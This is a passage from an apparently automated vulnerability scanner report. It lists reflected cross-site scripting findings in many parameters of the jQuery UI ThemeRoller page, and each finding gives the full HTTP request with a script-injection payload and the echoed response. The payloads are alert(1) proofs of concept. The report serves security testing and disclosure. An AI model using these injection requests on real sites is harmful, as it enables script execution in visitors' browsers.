derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.93. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>3489c3a9abe was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

3.94. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd5"><script>alert(1)</script>cf0fd2d235e was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.95. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24500"><script>alert(1)</script>c3b535455c0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.96. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff54"><script>alert(1)</script>46d7472778c was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.97. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ec"><script>alert(1)</script>a651755401d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

3.98. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa755"><script>alert(1)</script>9e8658b4fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?aa755"><script>alert(1)</script>9e8658b4fc4=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117096

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&aa755"><script>alert(1)</script>9e8658b4fc4=1" type="text/css" media="all" />
...[SNIP]...

3.99. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbeff"><script>alert(1)</script>a1aae8f9b17 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.100. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d5c6"><script>alert(1)</script>1cf7b57c6b was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.101. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be49"><script>alert(1)</script>a6f58046687 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

3.102. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54d46"><script>alert(1)</script>95af9515bdf was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
